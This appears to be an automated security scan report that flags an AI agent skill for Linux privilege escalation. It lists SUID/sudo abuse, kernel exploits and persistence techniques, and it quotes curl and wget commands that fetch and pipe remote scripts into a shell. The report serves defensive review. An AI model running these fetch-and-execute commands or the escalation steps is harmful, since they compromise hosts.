performing-privilege-escalation-on-linux

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This content contains explicit, actionable instructions and tooling to discover and exploit privilege-escalation vectors (SUID/sudo abuse, kernel exploits like Dirty Pipe/PwnKit, cron/PATH hijacking, Docker escape, creating SUID binaries for persistence), which directly facilitates deliberate system compromise and persistence despite an "authorized use" notice.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 0.90). The skill's workflow (references/workflows.md) explicitly instructs downloading and running third-party scripts from public GitHub/raw.githubusercontent.com URLs (e.g., curl -L https://github.com/.../linpeas.sh and wget https://raw.githubusercontent.com/.../linux-exploit-suggester.sh), which pulls untrusted public content that the agent would execute/read and could materially influence subsequent actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill includes runtime commands that fetch and execute remote scripts (e.g., curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh and wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh), which would execute remote code if run.

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs enumeration and exploitation techniques (SUID/SGID, sudo misconfigurations, kernel exploits, writable systemd/cron files, etc.) with the stated goal of achieving root, which directly guides compromising and modifying the host system.